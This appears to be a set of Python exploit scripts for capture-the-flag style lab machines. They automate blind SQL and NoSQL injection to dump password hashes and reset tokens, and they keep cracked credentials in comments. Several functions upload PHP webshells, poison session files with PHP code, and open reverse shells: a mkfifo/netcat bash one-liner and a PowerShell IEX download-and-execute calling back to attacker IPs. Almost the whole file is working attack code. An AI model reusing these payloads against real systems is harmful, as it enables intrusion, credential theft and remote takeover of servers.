def pwn():
# curl 'http://10.10.10.121:3000/GRAPHQL?query=query%7buser%7b%20username%20password%7d%7d'
# [email protected]:godhelpmeplz
# sqli in view_tickets_controller.php
t = ya.Transport(payloadProcessor=pPayload,
predicate=boolPredicate,
requestPath='req-view.txt')
# qry = 'select @@version' # 5.7.24-0ubuntu0.16.04.1
# r = ya.boolExfiltrate(t, qry, 'mysql')
# users, settings
# qry = ya.templates['mysql']['select']['tables']
# ['USER', 'CURRENT_CONNECTIONS', 'TOTAL_CONNECTIONS', 'id', 'salutation', 'fullname', 'email', 'password', 'timezone', 'status']
# qry = ya.templates['mysql']['select']['columns'].format(table='users')
# qry = 'select email from users'
# qry = 'select password from users'
# [email protected]:c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca
# [email protected]:ec09fa0d0ba74336ea7fe392869adb198242f15a
# qry = ya.templates['mysql']['select']['columns'].format(table='staff')
# ['id', 'username', 'password', 'fullname', 'email', 'login', 'last_login', 'department', 'timezone', 'signature', 'newticket_notification', 'avatar', 'admin', 'status']
# qry = 'select username from staff'
qry = 'select password from staff'
# admin:d318f44739dced66793b1a603028133a76ae680e:Welcome1
r = ya.boolExfiltrateList(t, qry, 'mysql')
def pwn():
# t = ya.Transport(payloadProcessor=pPayload, responseProcessor=pResponse, requestPath='request.txt')
# res = t.send(ya.templates['mssql']['select']['version']) # Microsoft SQL Server 2014 - 12.0.2269.0 (X64)
# res = t.send(ya.templates['mssql']['select']['isShellEnabled']) # 1
# res = t.send(ya.templates['mssql']['select']['user']) # web
# res = t.send(ya.templates['mssql']['select']['database']) # web
# print(res)
# idx = 0
# while True:
# # qry = ya.templates['mssql']['select']['tables'] # _logins, TEST1, TMPYU
# # qry = ya.templates['mssql']['select']['columns'].format(table='_logins') # _e, _l, _n, _p, _u, id
# # qry = ya.templates['mssql']['select']['columns'].format(table='TEST1') # ID, OUT
# # qry = ya.templates['mssql']['select']['columns'].format(table='TMPYU') # ID, OUT
# qry = 'SELECT _e FROM _logins' # [email protected]
# limit = ya.templates['mssql']['util']['limit'].format(count=1, offset=idx)
# res = t.send(f'{qry} {limit}')
# if res is None: break
# print(res)
# idx += 1
# interactiveCli(rce)
# REMEMBER: python -m http.server 80
# p = subprocess.Popen('nc -lvp 443'.split(' '))
# revshell = R"""c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString(''http://10.10.14.16/Invoke-PowerShellTcp.ps1'');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 443" """
# rce(revshell)
# p.communicate()
# bool
t = ya.Transport(payloadProcessor=pBoolPayload,
predicate=boolPredicate,
requestPath='req-verify.txt')
ya.boolExfiltrate(t, 'SELECT @@version', 'mssql')
def rce(cmd):
t = ya.Transport(payloadProcessor=pPayload,
responseProcessor=boolPredicate,
requestPath='req-view.txt')
t.payloadProcessor = pPayloadStacked
ya.mssqlShell(t, cmd)
t.payloadProcessor = pPayload
ya.mssqlExfilShell(t)
def pwn():
t = ya.Transport(payloadProcessor=pPayload,
predicate=timePredicate,
requestPath='req-view.txt',
debug=True)
s = t.client.session
res = s.post('http://192.168.0.150/login/resetPassword.php',
data={'username': '******'})
# qry = 'select @@version'
# 5.7.33-0ubuntu0.18.04.1
qry = 'select token from user where id_level = 1'
# unaccessable_until_you_change_me, mJAL3qtMatNCDJ0
newPwd = 'mypassword'
token = ya.boolExfiltrate(t, qry, 'mysql', timeBasedDelay=1)
data = {'token': token, 'password': newPwd}
res = s.post('http://192.168.0.150/login/doChangePassword.php', data=data)
if 'Oops!' in res.text:
print('[-] error reseting password')
exit(-1)
print(f'[+] login = admin:{newPwd}')
data = {'username': '******', 'password': newPwd}
res = s.post('http://192.168.0.150/login/checkLogin.php', data=data)
if 'Oops!' in res.text:
print('[-] error login')
exit(-1)
print('[+] logged in')
file = {
'id': '2',
'id_user': '******',
'name': 'foo',
'description': 'bar',
'price': '1',
'image':
('x.phar', "<?php system($_GET['cmd']); ?>", 'application/x-php')
}
res = s.post('http://192.168.0.150/item/updateItem.php', files=file)
if 'Oops!' in res.text:
print('[-] error uploading webshell')
exit(-1)
print('[+] webshell uploaded')
ip = '192.168.0.102'
port = 5555
revshell = f'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {ip} {port} >/tmp/f'
p = subprocess.Popen(f'nc -lvp {port}'.split(' '))
res = s.get('http://192.168.0.150/item/image/x.phar',
params={'cmd': revshell})
p.communicate()
def pwn():
# t = ya.Transport(payloadProcessor=pPayload, predicate=boolPredicate, requestPath='req.login')
t = ya.Transport(payloadProcessor=pPayload,
predicate=timePredicate,
requestPath='req.login')
# qry = ya.templates['sqlite']['select']['version']
# res = ya.boolExfiltrate(t, qry, 'sqlite')
# qry = ya.templates['sqlite']['select']['tables']
# ['users', 'notes', 'bookings', 'sessions']
# qry = ya.templates['sqlite']['select']['columns'].replace('{table}', 'users')
# ['CREATE TABLE users (id INTEGER PRIMARY KEY AUTOINCREMENT,username TEXT,password TEXT,active TINYINT(1))']
# qry = "SELECT username FROM users"
qry = "SELECT password FROM users"
# RickA:fdc8cd4cff2c19e0d1022e78481ddf36 (nevergonnagiveyouup)
# res = ya.boolExfiltrateList(t, qry, 'sqlite')
res = ya.boolExfiltrateList(t, qry, 'sqlite', timeBasedDelay=2)
print(res)
def pwn():
t = ya.Transport(payloadProcessor=pPayload,
predicate=boolPredicate,
requestPath='req.login')
dbms = 'mysql'
# qry = ya.templates[dbms]['select']['version']
# 10.0.23-MariaDB
# qry = ya.templates[dbms]['select']['user']
# root@localhost
# qry = ya.templates[dbms]['select']['database']
# seattle
# ya.boolExfiltrate(t, qry, dbms)
# qry = ya.templates[dbms]['select']['tables']
# ['tblBlogs', 'tblMembers', 'tblProducts']
# qry = ya.templates[dbms]['select']['columns'].replace('{table}', 'tblMembers')
# ['id', 'username', 'password', 'session', 'name', 'blog', 'admin']
qry = 'SELECT password from tblMembers'
# [email protected]:Assasin1
res = ya.boolExfiltrateList(t, qry, dbms)
print(res)
def pwn():
t = ya.Transport(
payloadProcessor=pPayload,
predicate=boolPredicate,
requestPath='req-login.txt'
)
# qry = 'select @@version'
# ya.boolExfiltrate(t, qry,'mysql')
# q = ya.templates['mysql']['select']['tables']
# users
# q = ya.templates['mysql']['select']['columns'].format(table='users')
# ID, username, password, role
# q = 'SELECT password FROM users'
# admin, chris
# 0e462096931906507119562988736854, d4ee02a22fc872e36d9e3751ba72ddc8:juggling
# ya.boolExfiltrateList(t, q, 'mysql')
# admin:240610708
# RUN FTP SERVER WITH shell.php
# python3 -m pyftpdlib -p21 -w
ftp = threading.Thread(target=ftpd)
ftp.daemon = True
ftp.start()
s = t.client.session
s.post('http://10.10.10.73/login.php', {'username':'******','password':'******'})
res = s.post('http://10.10.10.73/upload.php', {'url':'http://10.10.14.9/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.gif'})
hit = re.findall('/var/www/html/(.*?);', res.text)[0]
l = subprocess.Popen('nc -lvp 5555', shell=True)
params = {'cmd':'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.9 5555 >/tmp/f'}
try:
s.get(f'http://10.10.10.73/{hit}/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php', params=params, timeout=0.0001)
except requests.exceptions.ReadTimeout:
pass
l.communicate()
def pwn():
t = ya.Transport(payloadProcessor=pPayload,
predicate=boolPredicate,
requestPath='req-user.txt')
pTmp = partial('{guess}'.format)
users = ya.boolExfiltrateList(t,
pTmp,
'nosql',
searchChars=string.ascii_lowercase,
exfilType=ya.BoolExfiltrateType.NOSQL)
# users = ['admin', 'mango']
for user in users:
with open('req-pass.txt', 'r') as f:
userFilled = f.read().replace('{user}', user)
t.client = ya.HttpClient.parse(userFilled, debug=True)
searchChars = ''.join(
list(set(string.printable) - set(string.whitespace)))
# pTmp = partial('PREFIX{guess}'.format)
passwords = ya.boolExfiltrateList(
t,
pTmp,
'nosql',
searchChars=searchChars,
exfilType=ya.BoolExfiltrateType.NOSQL)
def boolPredicate(res):
if 'very sorry' in res.text:
return True
else:
return False
def pPayload(p):
p = p.replace('SELECT ', '', 1)
sqli = f'465\' union select case when ({p})=1 then "main" else "contact" end-- -'
return sqli
t = ya.Transport(payloadProcessor=pPayload,
predicate=boolPredicate,
requestPath='req-index.txt',
useSsl=True)
def rce(cmd):
t.client.session.cookies['webshell'] = '<?php system($_GET["cmd"]) ?>'
res = t.client.session.get(
'https://www.nestedflanders.htb/index.php?id=25')
wsPath = f'/var/lib/php/sessions/sess_{res.cookies["PHPSESSID"]}'
params = {
'id': f'465\' union select "1\' union select \'{wsPath}\'-- -"-- -',
'cmd': cmd
}
res = t.client.session.get('https://www.nestedflanders.htb/index.php',
params=params)
print(res.text)